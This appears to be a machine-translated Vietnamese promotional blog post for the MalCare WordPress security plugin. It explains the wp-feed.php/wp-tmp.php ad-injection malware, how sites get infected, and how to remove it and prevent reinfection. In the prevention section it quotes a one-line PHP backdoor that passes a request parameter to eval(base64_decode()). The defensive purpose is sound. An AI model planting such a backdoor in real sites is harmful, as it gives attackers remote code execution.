Máy quét phần mềm độc hại của bạn có đang cảnh báo bạn rằng “trang web của bạn bị tấn công” nhưng nó vẫn ổn đối với bạn?
Khách truy cập có phàn nàn về quảng cáo spam trên trang web WordPress của bạn nhưng bạn không thấy bất kỳ quảng cáo nào không?
Rất có thể trang web của bạn bị tấn công.
Tin tặc tìm ra những cách thông minh để ngụy trang các vụ tấn công của họ từ chủ sở hữu trang web để họ không bị phát hiện và họ có thể tiếp tục khai thác trang web trong thời gian dài.
Wp-feed.php là một trong những cách hack được ngụy trang khéo léo nhất hiện có.
Ẩn với chủ sở hữu trang web, nó hiển thị quảng cáo cho các sản phẩm bất hợp pháp, ma túy và nội dung người lớn cho khách truy cập của bạn.
Ngay cả khi bạn đã có thể phát hiện ra nó, việc tìm kiếm tất cả những nơi mà nhiễm trùng đã lây lan không chỉ khó khăn mà đôi khi là bất khả thi. Việc loại bỏ các ổ nhiễm trùng rất phức tạp và khó khăn. Nếu bạn cố gắng loại bỏ nó, 8 trong số 10 trường hợp, nhiễm trùng xuất hiện trở lại.
Điểm mấu chốt:thật khó để loại bỏ sự lây nhiễm wp-feed.php khỏi trang web WordPress.
May mắn thay, chúng tôi đã xử lý phần mềm độc hại này vô số lần trước đây. Trong thập kỷ qua, chúng tôi không chỉ xóa thành công wp-feed khỏi hàng trăm và hàng nghìn trang web WordPress mà còn ngăn chặn sự tái nhiễm trùng.
Đừng lo. Bạn đang ở trong tay tốt.
Trong bài viết này, bạn sẽ tìm hiểu:
- Cách phần mềm độc hại wp-feed.php hoạt động và tác động của nó đến trang web của bạn
- Cách xóa nó khỏi trang web của bạn
- Cách ngăn ngừa tái nhiễm trong tương lai
TL; DR : Để loại bỏ nhiễm trùng wp-feed.php, tất cả những gì bạn chỉ cần làm là cài đặt của chúng tôi Xóa phần mềm độc hại trong WordPress và chạy chức năng Tự động làm sạch. Plugin cũng giúp ngăn ngừa tái nhiễm bằng cách Xóa các cửa hậu trang web cho phép tái nhiễm và Chặn lưu lượng truy cập độc hại truy cập vào trang web của bạn bằng tường lửa và bảo vệ đăng nhập.
wp-feed.php &wp-tmp.php là gì? (Nguyên nhân, Triệu chứng &Tái nhiễm)
Tóm lại: WP-Feed là một loại phần mềm độc hại hiển thị quảng cáo độc hại trên các trang web. Mục đích là khiến khách truy cập của bạn nhấp vào quảng cáo và chuyển hướng họ đến một trang web độc hại.
Chắc hẳn bạn đang thắc mắc -
> Trang web của tôi bị nhiễm virut như thế nào?
Sự lây nhiễm nói chung là do việc sử dụng plugin hoặc chủ đề đã bị vô hiệu hóa .
Phần mềm Nulled rất hấp dẫn để sử dụng vì chúng cung cấp miễn phí cho bạn các tính năng cao cấp. Nhiều người tin rằng phần mềm nulled được phân phối như một hành động nhân từ.
Điều đó thường khác xa với trường hợp. Phần mềm Nulled được phân phối để tin tặc có thể dễ dàng truy cập vào trang web của bạn.
Các plugin hoặc chủ đề vô hiệu hóa chứa đầy phần mềm độc hại. Khi bạn cài đặt một chủ đề hoặc plugin nulled trên trang web của mình, về cơ bản, bạn đang mở ra cánh cửa cho tin tặc truy cập vào trang web của bạn.
Bên cạnh phần mềm vô hiệu, các plugin và chủ đề lỗi thời cũng có thể dễ bị tổn thương. Tin tặc khai thác các lỗ hổng này để đột nhập vào trang web của bạn.
Họ cũng khai thác tên người dùng và mật khẩu yếu như “admin” và “p @ ssword.” Thông tin đăng nhập yếu rất dễ đoán.
Một tin tặc có thể đoán tên người dùng và thông tin đăng nhập của bạn, đồng thời cấy trực tiếp phần mềm độc hại wp-feed.php vào trang web của bạn.
> Tại sao tin tặc lại lây nhiễm các trang web bằng wp-feed.php?
Mục đích là đánh cắp khách truy cập của bạn và lừa họ mua các dịch vụ hoặc sản phẩm giả mạo để tin tặc có thể tạo ra doanh thu.
Điều thực sự đáng kinh ngạc là làm thế nào họ thường có thể đạt được điều này mà không cần chủ sở hữu trang web nhận được một gợi ý nào.
Điều này đưa chúng ta đến câu hỏi -
> Tại sao khó nhận thấy các triệu chứng của bệnh nhiễm trùng này?
Khi tin tặc có quyền truy cập vào trang web của bạn, chúng sẽ cấy hai tệp (wp-feed.php &wp-tmp.php) vào thư mục wp-include của bạn.
Thư mục wp-include là một phần của lõi WordPress của bạn. Đó là nơi chứa chủ đề của trang web của bạn.
Tệp nguồn cấp dữ liệu WP bắt đầu lây nhiễm các tệp WordPress khác, đặc biệt là function.php, là một phần của chủ đề đang hoạt động của bạn.
Từ bên trong function.php, tin tặc có thể hiển thị quảng cáo bật lên độc hại trên trang web WordPress của bạn.
Tuy nhiên, phần thực sự khó hiểu là quảng cáo chỉ được hiển thị cho những khách truy cập mới , không lặp lại khách truy cập. Phần mềm độc hại ghi lại những khách truy cập vào trang web của bạn để đảm bảo rằng chỉ những khách truy cập mới được hiển thị quảng cáo. Đây là một cách khéo léo để ngăn chặn sự phát hiện.
Do đó, với tư cách là một khách truy cập thường xuyên vào trang web của bạn, không bao giờ nhận thấy bất kỳ dấu hiệu nào của việc bị tấn công.
Cách làm sạch Phần mềm độc hại wp-feed.php?
Có hai cách để loại bỏ nhiễm trùng. Đó là -
1. Sử dụng một plugin (dễ dàng)
2. Làm điều đó theo cách thủ công (khó)
Hãy đi sâu vào từng phương pháp.
1. Loại bỏ phần mềm độc hại WP-Feed.php bằng một plugin (cách dễ dàng)
Một số bạn có thể đã cài đặt plugin bảo mật trên trang web của mình. Có thể chính plugin này đã cảnh báo bạn về các tệp độc hại - wp-include / wp-feed.php và wp-include / wp-tmp.php .
Hầu hết các plugin bảo mật đều cung cấp dịch vụ loại bỏ phần mềm độc hại, nhưng rất ít plugin có thể làm điều đó nhanh chóng và hiệu quả như MalCare Security.
- MalCare sẽ làm sạch trang web của bạn trong vòng 60 giây . Bạn không cần phải tăng vé. Bạn không phải xếp hàng đợi. Bạn không phải giao thông tin đăng nhập trang web của mình cho plugin của bên thứ ba.
- Không chỉ vậy, plugin còn vượt xa mọi ngóc ngách, tìm kiếm phần mềm độc hại ẩn. Nó tìm thấy mọi tập lệnh độc hại trình bày trên trang web của bạn.
- Nó sử dụng các phương pháp phi truyền thống để phát hiện phần mềm độc hại mới và ẩn tốt . Nó phân tích kỹ lưỡng hành vi của mã để xác định mục đích xấu. Điều này cũng giúp đảm bảo rằng nó không đánh dấu mã tốt là xấu .
- Nó thực hiện tất cả những điều đó trong khoảng thời gian vài phút .
Hãy xóa sạch sự lây nhiễm wp-feed.php với MalCare.
Bước 1: Cài đặt và kích hoạt MalCare Security trên trang web WordPress của bạn.
Bước 2: Từ menu bảng điều khiển của bạn, chọn MalCare. Nhập địa chỉ email của bạn và nhấp vào Trang web an toàn ngay bây giờ .
Bước 3: Trên trang tiếp theo, bạn sẽ được yêu cầu nhập mật khẩu và sau đó để nhập URL của bạn .
MalCare sẽ bắt đầu quét trang web của bạn ngay lập tức. Mục đích là để tìm mọi trường hợp mã độc có trên trang web của bạn.
Điều này có nghĩa là, nó sẽ không chỉ phát hiện các tệp wp-feed.php và wp-tmp.php, mà còn tất cả các mã độc hại lây nhiễm vào các tệp WordPress của bạn, bao gồm cả các trường hợp ẩn trong tệp function.php.
Bạn có thể yên tâm rằng plugin cũng sẽ tìm thấy mọi cửa sau duy nhất hiện diện trên trang web của bạn, để ngăn chặn sự tái nhiễm.
Khi tìm thấy các tập lệnh độc hại, plugin sẽ cảnh báo cho bạn về nó.
Tiếp theo, bạn cần làm sạch trang web của mình.
Xin lưu ý rằng MalCare’s xóa phần mềm độc hại là một tính năng cao cấp. Đó là chỉ tức thì plugin loại bỏ phần mềm độc hại ra khỏi đó. Với 99 đô la một năm, bạn có thể dọn dẹp một trang web nhiều lần tùy thích và đảm bảo được bảo vệ tốt nhất mà bạn có thể có. Tìm hiểu thêm về Định giá MalCare .
Bước 4: Để xóa mọi dấu vết của wp-feed.php khỏi trang web của bạn, tất cả những gì bạn cần làm là nhấp vào Tự động làm sạch nút.
MalCare sẽ bắt đầu dọn dẹp trang web của bạn ngay lập tức.
Vậy đó, các bạn. Đó là cách bạn làm sạch trang web của mình bằng một plugin.
2. Xóa phần mềm độc hại WP-Feed.php theo cách thủ công (cách khó)
Loại bỏ vết nhiễm trùng theo cách thủ công là khá khó khăn, bởi vì, trong loại nhiễm trùng này, có rất nhiều mảnh chuyển động.
- Tin tặc tải lên hai tệp độc hại - wp-feed.php &wp-tmp.php. Bạn cần xóa chúng để bắt đầu. Đây có lẽ là chút dễ dàng duy nhất.
- Sự lây nhiễm lây lan sang các tệp WordPress khác, bao gồm cả tệp function.php. Điều này thật khó, bởi vì ai là người có thể nói nơi nhiễm trùng đã lây lan.
- Bạn sẽ mất hàng giờ để tìm tất cả mã độc hại.
- Việc nhận dạng mã độc rất khó khăn vì chúng được ngụy trang tốt và trông giống như các đoạn mã bình thường.
- Một số mã độc hại đã biết, như “eval (base64_decode)”, có thể là một phần của các plugin hợp pháp. Chúng không được sử dụng theo cách độc hại. Do đó, việc xóa mã sẽ ảnh hưởng đến plugin của bạn và thậm chí có thể làm hỏng trang web của bạn.
- Có khả năng khá cao là bạn sẽ bỏ lỡ các đoạn mã có thể dẫn đến việc kiểm tra lại.
Do đó, việc loại bỏ thủ công không có hiệu quả.
Tuy nhiên, nếu bạn vẫn muốn làm điều đó, vui lòng sao lưu toàn bộ trang web của bạn. Nếu bạn vô tình xóa một thứ gì đó và làm hỏng trang web của mình, bạn có thể nhanh chóng khôi phục nó về trạng thái bình thường.
Dưới đây là danh sách các dịch vụ sao lưu tốt nhất mà bạn có thể lựa chọn.
Và đây là bài viết sẽ giúp bạn xóa phần mềm độc hại theo cách thủ công - WordPress bị tấn công. Chỉ cần chuyển đến phần “Cách làm sạch trang web WordPress bị tấn công theo cách thủ công” phần.
Trang web của bạn hiện không bị lây nhiễm, nhưng vẫn chưa an toàn. Tin tặc vẫn có thể nhắm mục tiêu trang web của bạn và cố gắng lây nhiễm nó. Bạn cần đảm bảo rằng trang web của bạn được bảo vệ khỏi sự lây nhiễm trong tương lai. Nhưng trước khi đi sâu vào vấn đề đó, hãy cùng xem tác động của việc lây nhiễm wp-feed.php &wp-tmp.php.
Tác động của việc lây nhiễm phần mềm độc hại wp-temp.php
Không cần phải nói rằng sự hiện diện của phần mềm độc hại wp-feed.php &wp-tmp.php có thể có tác động nghiêm trọng đến trang web của bạn.
Các trang web đã bị nhiễm wp-temp.php thường sẽ phải chịu những hậu quả sau:
- Bạn sẽ nhận thấy tỷ lệ thoát tăng vọt và sự sụt giảm về thời gian của khách truy cập chi tiêu trên trang web của bạn.
- Quảng cáo bật lên sẽ làm cho trang web của bạn nặng và thực sự chậm .
- Không ai thích một trang web chậm, vì vậy khách truy cập có khả năng nhấn nút quay lại trước khi các trang của bạn tải trên trình duyệt. Điều này sẽ có hiệu ứng domino.
- Công cụ tìm kiếm sẽ nhận thấy mọi người rời khỏi trang web của bạn nhanh như thế nào. Họ sẽ kết luận rằng bạn không cung cấp những gì người dùng đang tìm kiếm. Xếp hạng công cụ tìm kiếm của bạn sẽ giảm .
- Điều này có nghĩa là tất cả nỗ lực, thời gian và tiền bạc bạn có thể đã chi tiêu để xếp hạng cao hơn trong SERPs thật lãng phí .
- Các trang web bị tấn công nằm trong danh sách đen bởi Google và bị tạm ngưng bởi các nhà cung cấp dịch vụ lưu trữ. Ngoài ra, nếu các trang web bị tấn công đang chạy quảng cáo google, thì tài khoản adwords sẽ bị treo. Tất cả điều này sẽ dẫn đến lưu lượng truy cập sâu hơn.
- Hơn nữa, các trang web bị tấn công phải được làm sạch, điều này có thể là một việc tốn kém nếu bạn không sử dụng đúng công cụ.
Tin tốt là bạn biết rằng trang web của bạn đã bị tấn công. Do đó bạn có thể làm sạch nó và dừng tác động.
Cách bảo vệ trang web của bạn khỏi phần mềm độc hại wp-feed.php trong tương lai?
Nhiều độc giả của chúng tôi có thể đã thử xóa phần mềm độc hại wp-feed.php khỏi trang web của họ, chỉ để phát hiện ra rằng phần mềm độc hại tiếp tục quay trở lại.
Điều này xảy ra vì có một cửa sau được cài đặt trên trang web của bạn. Hầu hết các backdoor đều được ngụy trang cực kỳ tốt, đến mức chúng có thể bị các nhà phát triển nghiệp dư chuyển qua làm mã hợp pháp.
Trong phần trước, chúng tôi đã giải thích rằng tin tặc chèn hai tệp wp-feed.php &wp-tmp.php vào mã trang web của bạn. Tệp wp-tmp.php hoạt động như một cửa hậu. Nếu bạn mở tệp, bạn sẽ thấy một tập lệnh trông giống như thế này -
$p = $REQUEST$#91;”m”]; eval(base64_decode ($p));
Tin tốt là bạn có thể bảo vệ trang web của mình khỏi các nỗ lực tấn công trong tương lai bằng cách thực hiện các biện pháp sau -
1. Xóa phần mềm Nulled &Ngừng sử dụng chúng
Nếu bạn đang sử dụng một plugin hoặc chủ đề vô hiệu trên trang web của mình, hãy xóa nó ngay lập tức .
Tin tặc đã giành được quyền truy cập vào trang web của bạn bằng cách sử dụng phần mềm nulled ngay từ đầu. Bất kể bạn làm sạch trang web của mình tốt đến đâu, nếu bạn không xóa phần mềm bị vô hiệu hóa, tin tặc sẽ tìm đường vào trang web của bạn và cấy phần mềm độc hại.
Nếu bạn đã cấp cho người dùng của mình quyền cài đặt các plugin và chủ đề, hãy đảm bảo rằng họ không bao giờ sử dụng phần mềm nulled.
Trên thực tế, tốt hơn là bạn nên thực hành để ngăn chặn hoàn toàn việc cài đặt các plugin và chủ đề với sự giúp đỡ của MalCare.
Tất cả những gì bạn cần làm là đăng nhập vào bảng điều khiển của MalCare, chọn trang web của bạn, nhấp vào Áp dụng Làm cứng và bật Chặn Plugin / Chủ đề Cài đặt.
2. Bảo mật trang web của bạn
Bạn có thể ngăn tin tặc cấy các tệp độc hại như wp-feed.php vào các thư mục WordPress của mình bằng cách thay đổi quyền đối với tệp .
Quyền đối với tệp là một tập hợp các quy tắc xác định ai có thể truy cập tệp nào. Bạn có thể chặn người dùng sửa đổi thư mục wp-include. Để hiểu sâu hơn về quyền đối với tệp, hãy xem hướng dẫn này:Quyền đối với tệp WordPress.
Bạn cũng có thể chặn tin tặc sửa đổi chủ đề của mình bằng cách tắt trình chỉnh sửa tệp . Điều này sẽ ngăn họ đưa quảng cáo bật lên trên trang web của bạn. Bạn có thể làm điều đó theo cách thủ công nhưng điều này rất rủi ro và không được khuyến khích.
Nếu bạn đã cài đặt MalCare trên trang web của mình, tất cả những gì bạn cần làm là nhấp vào nút để tắt trình chỉnh sửa tệp.
Tìm hiểu thêm về tăng cường WordPress.
3. Luôn cập nhật trang web của bạn
Cũng giống như bất kỳ phần mềm nào khác, các plugin và chủ đề WordPress phát triển các lỗ hổng bảo mật. Khi các nhà phát triển tìm hiểu về lỗ hổng này, họ nhanh chóng tạo một bản vá và phát hành nó dưới dạng bản cập nhật.
Nếu có bất kỳ sự chậm trễ nào trong việc triển khai cập nhật, điều đó sẽ khiến trang web của bạn gặp rủi ro.
Tin tặc rất giỏi trong việc khai thác lỗ hổng bảo mật . Trên thực tế, họ luôn đề phòng những trang web có lỗ hổng để có thể lợi dụng nó nhằm chiếm quyền truy cập và lây nhiễm phần mềm độc hại vào trang web.
Do đó, đừng bao giờ trì hoãn cập nhật.
Bạn có thể tìm hiểu thêm về các bản cập nhật bảo mật từ đây - Bản cập nhật bảo mật WordPress.
Dưới đây là hướng dẫn sẽ giúp bạn cập nhật trang web của mình - Cách cập nhật WordPress.
4. Thực thi việc sử dụng thông tin đăng nhập mạnh mẽ
Cách dễ nhất để truy cập vào trang web của bạn là thông qua trang đăng nhập của bạn.
Tin tặc chỉ cần đoán thành công thông tin đăng nhập người dùng của bạn. Trên thực tế, họ thiết kế các bot có thể thử hàng trăm cách kết hợp tên người dùng và mật khẩu trong vòng vài phút. Nếu bạn hoặc bất kỳ đồng đội nào của bạn đang sử dụng thông tin đăng nhập dễ đoán như “quản trị viên” và “password123”, các bot sẽ mất 2 giây để xâm phạm trang web của bạn. Đây được gọi là một cuộc tấn công vũ phu.
Điều quan trọng là đảm bảo rằng mọi người dùng trang web của bạn đều sử dụng tên người dùng duy nhất và mật khẩu mạnh.
Bạn thậm chí có thể vượt qua điều này và thực hiện một số biện pháp để bảo vệ trang đăng nhập của mình. Chúng tôi đã biên soạn một danh sách các biện pháp bảo mật đăng nhập WordPress mà bạn có thể thực hiện.
5. Sử dụng tường lửa
Sẽ thật tuyệt nếu ngay từ đầu bạn có thể ngăn chặn tin tặc tấn công trang web của mình phải không?
Tường lửa chỉ là công cụ bạn cần.
Nó điều tra lưu lượng truy cập muốn có quyền truy cập vào trang web của bạn. Nếu nó phát hiện ra rằng lưu lượng truy cập bắt nguồn từ một địa chỉ IP độc hại, tường lửa sẽ ngay lập tức chặn lưu lượng đó.
Bằng cách này, nó lọc ra các hacker và bot.
Dưới đây là danh sách các tường lửa WordPress tốt nhất mà bạn có thể kích hoạt trên trang web của mình.
Tuy nhiên, nếu bạn đang sử dụng MalCare, thì bạn đã kích hoạt tường lửa trên trang web của mình.
Tiếp theo là gì?
Chúng tôi đã chỉ cho bạn cách làm sạch trang web của bạn và cách đảm bảo rằng bạn không bao giờ bị tấn công nữa.
Một lời khuyên mà chúng tôi nghĩ sẽ cứu trang web của bạn khỏi một số thảm họa là - hãy thường xuyên sao lưu trang web của bạn.
Cho dù trang web của bạn đột nhiên gặp lỗi hoặc bị hỏng, bản sao lưu sẽ giúp bạn nhanh chóng khắc phục tạm thời trang web của mình.
Nếu bạn đăng ký MalCare Security, bạn cũng có thể tận dụng một addon dự phòng với một khoản phụ phí. Hãy liên hệ với chúng tôi để tìm hiểu thêm.
Cho Plugin bảo mật MalCare một vòng quay!